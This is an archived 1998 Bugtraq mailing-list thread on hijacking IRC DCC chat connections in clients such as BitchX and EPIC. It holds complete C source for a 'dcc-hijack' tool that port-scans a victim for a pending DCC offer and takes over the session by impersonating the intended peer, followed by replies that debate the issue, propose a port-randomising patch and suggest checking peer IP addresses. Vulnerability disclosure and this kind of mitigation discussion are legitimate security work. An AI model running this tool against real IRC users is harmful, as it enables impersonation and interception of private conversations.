Hackers Handbook - Millenium Edition

home *** CD-ROM | disk | FTP | other *** search

/ Hackers Handbook - Millenium Edition / Hackers Handbook.iso / files / c_scripts / dcc-hijack.c < prev next >

Wrap

Internet Message Format | 1999-04-11 | 21KB

Date: Sat, 19 Dec 1998 13:58:04 +0100 From: awgn@COSMOS.IT Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: Irc: another funny stuff. In some irc clients dcc may be hijacked. I just found a funny bug playing with some irc-client. DCC-chat may be hijacked... The trouble comes while clients bind port to accept or request a dcc CHAT/SEND/ or RECEIVE. Being this a simple TCP connection without any ip control.. the way to exploit is trivial. Here we go: B , the hi-jacker wants to have fun with A. So he first creates a dcc connection with A, getting the port binded. Now A is under attack since next ports used to create connections will be quite consecutive to the first one. BitchX and IRCepic seem to be affected with this matter. ( other clients???) Now A tries to /dcc chat C, but this is just a bit lagged. ( C maybe a bot? ) B , using the following source, is going to assume the identity of C except for his host. :-) I simply implemented some routines of my hailscan to guess which is the port binded. When it finds an open port, it establish a connection running a kinda irc-client. All of this is just for educational purpose only. The source provided herein can be improved for better results. awgn@cosmos.it coding&networking division. [ Part 2: "Attached Text" ] /* Dcc hijack (c) 1998 awgn@cosmos.it * * Some pieces of this code are ripped from hailscan v 1.9908. * available at www.dislessici.org. ( hosted at cosmos.it ) * * CREDITS: cosmos.it -> this isp r0x!!!! ( Thansk to spider@cosmos.it ) * kasko, antirez & gigi_sull @seclab.com * * GREETINGS: *@dislessici.org , #hackers@ircity rappo,filo,cyber,litos,lordfelix... * Sir-Alex: take it easy... only God knows the truth ;-). * Thor: everyone is missing you. * Jwk, jam, zorro , c1rp0, megat0n -> how is going your parser ? ;) * * #hackers@undernet.org ( expecially to my buddy nigr zerox) * #america@undernet.org ( dedicated to my bro' sartre, exx & jeanlucP ) * #hackers.it@ircnet ( m0f0z - radon - Nail^d0d ) * * NERVOUS! -> how can i forget your nick? hehe * * Tested on Linux and *BSD. * * This code is provided for educational purposes only. */ #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #include <netdb.h> #include <unistd.h> #include <string.h> #include <stdlib.h> #include <stdio.h> #include <fcntl.h> #include <sys/time.h> #include <unistd.h> #include <errno.h> #define MAXSOCKET 32 #define TIMEOUT 10 struct sockaddr_in newsock; struct sweep { int sock; short port; long sec; long usec; struct sweep *next; }; struct sweep *sheet, *top_sheet; int csock = 0; int portcounter; int set_nonblock (int s) { int val = 0; if ((val = fcntl (s, F_GETFL, val)) == -1) return -1; val |= O_NONBLOCK; fcntl (s, F_SETFL, val); return 0; } int time_out (long int sec_a, long int usec_a, long int sec_b, long int usec_b, int time_max) { if ((((sec_a - sec_b) == time_max) && (usec_a > usec_b)) || ((sec_a - sec_b) > time_max)) return 1; return 0; } int push_sockets (void) { struct timeval actually; gettimeofday (&actually, NULL); if (!sheet->sock) { sheet->sock = socket (AF_INET, SOCK_STREAM, 0); if (set_nonblock (sheet->sock) == -1) return 0; sheet->sec = actually.tv_sec; sheet->usec = actually.tv_usec; sheet->port = portcounter++; } else return 0; return 1; } u_long getnbobyname (u_char * host) { struct in_addr addr; struct hostent *host_ent; if ((addr.s_addr = inet_addr (host)) == -1) { if (!(host_ent = gethostbyname (host))) { fprintf (stderr, "gethostbyname() or inet_addr() err:%s\n", strerror (errno)); return 0; } bcopy (host_ent->h_addr, (char *) &addr.s_addr, host_ent->h_length); } return addr.s_addr; } void client (int s, char *str) { FILE *in, *out; char in_line[1024]; char out_line[1024]; in = fdopen (s, "r"); out = fdopen (s, "a"); setlinebuf (in); setlinebuf (out); set_nonblock (s); printf ("\nGotcha!\nDCC hijacked.\n\n\n"); while (1) { while (fgets (in_line, 1024, in)) printf ("<%s> %s", str, in_line); fgets (out_line, 1024, stdin); if (strlen (out_line) > 1) fprintf (out, "%s", out_line); } exit (0); } void usage (char *name) { fprintf (stderr, "\ndcc-hijack (c) 1998 awgn@cosmos.it\n\n"); fprintf (stderr, "usage: %s host.of.dcc.asker baseport\n", name); exit (1); } void scan (unsigned long int a, int *out, unsigned short int *port) { struct timeval now; int i = 0; *out = 0; *port = 0; sheet = (struct sweep *) malloc (sizeof (struct sweep)); top_sheet = sheet; for (; i < MAXSOCKET; i++) { sheet->sock = 0; sheet->next = (struct sweep *) malloc (sizeof (struct sweep)); sheet = sheet->next; sheet->next = NULL; } sheet = top_sheet; newsock.sin_addr.s_addr = a; newsock.sin_family = AF_INET; while (1) { while (sheet->next) { gettimeofday (&now, NULL); if (!sheet->sock) push_sockets (); else { if (time_out (now.tv_sec, now.tv_usec, sheet->sec, sheet->usec, TIMEOUT)) sheet->sock = 0; else { newsock.sin_port = htons ((u_short) sheet->port); if (connect (sheet->sock, (struct sockaddr *) &newsock, sizeof (newsock)) == 0) { *out = sheet->sock; *port = sheet->port; return; } else switch (errno) { case EISCONN: *out = sheet->sock; *port = sheet->port; return; break; case ETIMEDOUT: case EINVAL: case ECONNREFUSED: case EADDRNOTAVAIL: close(sheet->sock); sheet->sock=0; break; } } } sheet = sheet->next; } sheet = top_sheet; } return; } int main (int argc, char **argv) { int nb0 = 0; int sock = 0; unsigned short port_guessed = 0; if (argc < 3) usage (argv[0]); if (!(nb0 = (u_long) getnbobyname ((char *) argv[1]))) { fprintf (stderr, "argv[1] err: which kind of host/ip did you pass me?\n"); exit (1); } if (!(portcounter = atoi (argv[2]))) { fprintf (stderr, "port() err: which kind of port did you pass me?\n"); exit (1); } scan (nb0, &sock, &port_guessed); if (!sock || !port_guessed) { fprintf (stderr, "Sorry: no port found.\nDCC between clients may be already estabilished.\n"); exit (1); } client (sock, argv[1]); return 0; } -------------------------------------------------------------------------- Date: Sun, 20 Dec 1998 10:35:43 -0500 From: Ben Winslow <rain@INSANE.LOONYBIN.NET> Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: Re: Ircii-epic: Irc: another funny stuff. In some irc clients dcc may be hijacked. (fwd) ---------- Forwarded message ---------- Received: from BlackHole.RainNet.Org (rain@BlackHole.RainNet.Org [192.168.1.3]) by Portal.RainNet.Org (8.8.8/8.8.8/Debian/GNU) with ESMTP id KAA26632 for <rain@portal.RainNet.Org>; Sun, 20 Dec 1998 10:31:10 -0500 Received: from listopher.concentric.net (listopher.concentric.net [206.173.119.117]) by BlackHole.RainNet.Org (8.8.5/8.8.5) with ESMTP id KAA13517 for <rain@insane.loonybin.net>; Sun, 20 Dec 1998 10:31:23 -0500 Received: (from majordom@localhost) by listopher.concentric.net (8.8.3/8.8.5) id KAA21767; Sun, 20 Dec 1998 10:06:15 -0500 (EST) Message-ID: <199812201506.JAA27379@nemesis.acronet.net> To: ircii-epic@concentric.net Subject: Re: Ircii-epic: Irc: another funny stuff. In some irc clients dcc may be hijacked. In-Reply-To: Your message of "19 Dec 1998 22:17:00 +0200." <77AMlEdphjB@kl.Snafu.DE> Date: Sun, 20 Dec 1998 09:06:07 -0600 >From: Jeremy Nelson <jnelson@acronet.net> Sender: owner-ircii-epic@concentric.net Precedence: bulk >I just found a funny bug playing with some irc-client. DCC-chat may be >hijacked... This is not a bug in the client. It is a function of the operating system. For example, this ``bug'' is not present in OpenBSD because it hands out ports randomly >The trouble comes while clients bind port to accept or request a dcc >CHAT/SEND/ or RECEIVE. Being this a simple TCP connection without any ip >control.. the way to exploit is trivial. This is preposterous. The client informs you of the remote IP address connecting. Any half-aware user checks the IP address to make sure that it is reasonable. >Here we go: > >B , the hi-jacker wants to have fun with A. So he first creates >a dcc connection with A, getting the port binded. > >Now A is under attack since next ports used to create connections will >be quite consecutive to the first one. BitchX and IRCepic seem to be >affected with this matter. ( other clients???) > >Now A tries to /dcc chat C, but this is just a bit lagged. ( C maybe a >bot? ) B , using the following source, is going to assume the identity of C >except for his host. :-) Folks, this is completely preposterous. This "exploit program" is nothing more than a limited-range port scanner. What this "exploit" boils down to is: "If you establish a DCC connection with me, then if I port-scan you later between when you offer a DCC and when it is received, I will be able to connect to your DCC offer." Well, duh. You could just turn this into a full-blown scanner and scan all day for DCC connections if thats what you wanted to accomplish, and even such a scanner as that would work on OpenBSD, where ports are handed out randomly. Folks, this is not a bug, except to the extent that you completely ignore the IP address on your established DCC transactions. If its not the right IP, close it and try again. And email the abuse contact of the offending ISP about how their users are port scanning you. Sheesh. Jeremy -------------------------------------------------------------------------- Date: Sun, 18 Oct 1998 19:50:48 +0200 From: Alessio Orlandi <nailtbt@TIN.IT> Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: DCC HiJacking patch for BitchX 75p1 Parts/Attachments: 1 Shown 26 lines Text 2 Shown 20 lines Text ---------------------------------------- Hi all, as recently discovered, with a simple port scan you can hijack some of the BitchX dcc connections. This due to the port assigning on the requesting client. Here follows a really short patch that will fix the problem. The problem is here: BitchX when creates a DCC connection (listening socket) uses the functions connect_by_number (defined in network.c file). Passing as port 0 This means that the OS will determine the port. Now.. for mental order.. the ports will be quiet consecutive. Bad.. Bad... So.. let's add a random value to the port returned by the system. All is now fixed. Patch follows ----------------------------------------------------------------------------------------- Regards Alessio "NaiL^d0d@ircnet/ircity" Orlandi Thanks to: hackers@ircity Litos (you one of my best friend), Nervous, awgn (hehe), Lordfelix (salam), Raptor, BlackJam, kasko, antirez and hackers.it@ircnet Soren, NaiF, Bonjo ---------------------------------------------------------------------------------------- [ Part 2: "Attached Text" ] --- source/network.c +++ source/network.c 1998/7/20 08:56:44 @@ -21,7 +21,9 @@ #ifdef HAVE_SYS_FILIO_H #include <sys/filio.h> #endif +/* NaiL^d0d: no hijack please, we need random bytes, in stdlib.h */ +#include <stdlib.h> extern char hostname[NAME_LEN+1]; extern int use_socks; @@ -172,6 +172,7 @@ memset(&name, 0, sizeof(struct sockaddr_in)); name.sin_family = AF_INET; name.sin_addr.s_addr = htonl(INADDR_ANY); name.sin_port = htons(*portnum); +name.sin_port+=(unsigned short)(rand() &255); if (bind(fd, (struct sockaddr *)&name, sizeof(name))) -------------------------------------------------------------------------- Date: Mon, 21 Dec 1998 16:33:30 -0500 From: Ben Winslow <rain@INSANE.LOONYBIN.NET> Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: Re: DCC HiJacking patch for BitchX 75p1 On Sun, 18 Oct 1998, Alessio Orlandi wrote: # Hi all, # as recently discovered, with a simple port scan you can hijack some # of the BitchX dcc # connections. This due to the port assigning on the requesting client. # Here follows a really short patch that will fix the problem. The problem # is here: # BitchX when creates a DCC connection (listening socket) uses the # functions # connect_by_number (defined in network.c file). Passing as port 0 # This means that the OS will determine the port. Now.. for mental order.. # the ports will be quiet consecutive. Bad.. Bad... So.. let's add a # random value to the port returned by the system. All is now fixed. # Patch follows # ----------------------------------------------------------------------------------------- # # Regards # Alessio # "NaiL^d0d@ircnet/ircity" Orlandi # Thanks to: hackers@ircity Litos (you one of my best friend), Nervous, # awgn (hehe), # Lordfelix (salam), Raptor, # BlackJam, kasko, antirez # and hackers.it@ircnet Soren, NaiF, Bonjo # ---------------------------------------------------------------------------------------- # # # This patch won't work-- what if a port you decide on is already in use by something else? Ben -------------------------------------------------------------------------- Date: Mon, 21 Dec 1998 16:27:13 -0500 From: Andy Dills <andy@SS5.XECU.NET> Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: Re: DCC HiJacking patch for BitchX 75p1 On Sun, 18 Oct 1998, Alessio Orlandi wrote: > the ports will be quiet consecutive. Bad.. Bad... So.. let's add a > random value to the port returned by the system. All is now fixed. > Patch follows Your patch changes the order, but there is still order. You need to call srand() once before using rand, to ensure actual randonimity. Andy -- System Administrator XecuNet Internet Services -------------------------------------------------------------------------- Date: Tue, 22 Dec 1998 18:48:43 -0600 From: mikey <mikey@PHEDZ.COM> Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: Re: DCC HiJacking patch for BitchX 75p1 Yes, this might help. But why worry? they would need to port scan, and find the port quicker than the other client can connect. Do you think they can do this all the time? Or Barely ever? So this is not a problem, I don't understand why anyone even got jumpy over it. I could do the same with ftp, ftp opens ports waiting to recieve files. Do you see people making patches for that? On Sun, 18 Oct 1998, Alessio Orlandi wrote: > Hi all, > as recently discovered, with a simple port scan you can hijack some > of the BitchX dcc > connections. This due to the port assigning on the requesting client. > Here follows a really short patch that will fix the problem. The problem > is here: > BitchX when creates a DCC connection (listening socket) uses the > functions > connect_by_number (defined in network.c file). Passing as port 0 > This means that the OS will determine the port. Now.. for mental order.. > the ports will be quiet consecutive. Bad.. Bad... So.. let's add a > random value to the port returned by the system. All is now fixed. > Patch follows > ----------------------------------------------------------------------------------------- > > Regards > Alessio > "NaiL^d0d@ircnet/ircity" Orlandi > Thanks to: hackers@ircity Litos (you one of my best friend), Nervous, > awgn (hehe), > Lordfelix (salam), Raptor, > BlackJam, kasko, antirez > and hackers.it@ircnet Soren, NaiF, Bonjo > ---------------------------------------------------------------------------------------- -------------------------------------------------------------------------- Date: Tue, 22 Dec 1998 15:41:26 -0500 From: Ben Winslow <rain@INSANE.LOONYBIN.NET> Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: Re: Ircii-epic: about dcc hijacking... (fwd) To: ircii-epic@concentric.net Subject: Re: Ircii-epic: about dcc hijacking... (fwd) In-Reply-To: Your message of "Mon, 21 Dec 1998 16:30:59 EST." <Pine.LNX.4.03.9812211630450.22325-100000@Portal.RainNet.Org> Date: Tue, 22 Dec 1998 10:31:31 -0600 >From: Jeremy Nelson <jnelson@acronet.net> Sender: owner-ircii-epic@concentric.net Precedence: bulk >Heya, I did not say that dcc-hijack.c is more than a simple tcp >portscanner, so this is not so preposterous as you wrote. What I thought was preposterous is that you presented this as some kind of serious problem. >Then if you read my post with attention you can't find anything absurde. No comment. >More, it could not be a `bug', anyway we can easly patch irc-client to >bind random port. This won't change the problem since you can still port-scan a wider range to pick up the random ports. This kind of stuff is best left to the operating system. Your "exploit" only works when: 1) Someone either accepts or initiates a dcc transaction with an untrusted party. 2) During the time that the untrusted party runs the port scanner, the DCC transaction is the one and only transaction that is pending. If, for example, someone is doing a FTP, then you could just as well pick up one of their PORT commands rather than a DCC listen. 3) The untrusted party runs the port scanner between when the person initiates the latter DCC CHAT and when the latter DCC CHAT is accepted. (Race condition) 4) The person does not double-check the IP address on the latter DCC CHAT to see if it is reasonable. >Which is your point of view? hehe My point of view is that one should write a script to hook /on dcc_offer, dispatch a userhost or userip (depending on your network) to retrieve the hostname of the person you are soliciting for a dcc transaction. When that hostname information comes back, stash it in a variable. When the DCC is accepted, if the hostname information has not come back, 'wait'. If it has come back, then check $2 (or whatever) against the IP address of the person you are interested in. If its not the same, chances are you have a conflict to look at. An alternative solution for those who are lazy is to keep a "moving" variable that holds open a DCC RAW port over the last few DCC's you have offered. Something that hooks /on dcc_offer and then does a $listen() to fool the port scanner into connecting to the $listen() socket would be sufficient. One must be careful to close their fd's though when theyre done. I do not feel that the random binding of ports offers anything useful above and beyond the current mechanism. If you are interested in implementing either of the above, then i would be most appreciative and interested in your work... Jeremy -------------------------------------------------------------------------- Date: Tue, 22 Dec 1998 13:48:06 -0500 From: YounGoat <youngoat@ALFHEIM.NET> Reply-To: Bugtraq List <BUGTRAQ@netspace.org> To: BUGTRAQ@netspace.org Subject: Re: DCC HiJacking patch for BitchX 75p1 I can see this being exploited. I'll give you an example. You have A who is trying to hijack B's DCC to C who is a bot. A dcc chat's B. (he gets the port that that B uses. And gives that to his hijack program which will then go thorough the next 150 ports or so over and over) A asks B if he is able to DCC chat the bot C. And asks B to try. When B tries to dcc the bot, guess who is right there ready to connect to B and give him a "Enter your password." prompt? This is not meant to be a guide for script kiddies, but I do believe this is certainly a problem, and the only sure fix is to check the hostname of the person connecting or use a password that is given during the DCC request for authentication. Since the latter would involve changing the IRC protocol, I'd say irc clients are just going to have to verify that the right person is connecting. With that, the worst thing that could happen is that somebody could keep connecting and the irc client would keep rejecting him, possibly causing a DOS. ---------------------------------- E-Mail: YounGoat <youngoat@alfheim.net> Date: 22-Dec-98 Time: 13:39:09 This message was sent by XFMail ----------------------------------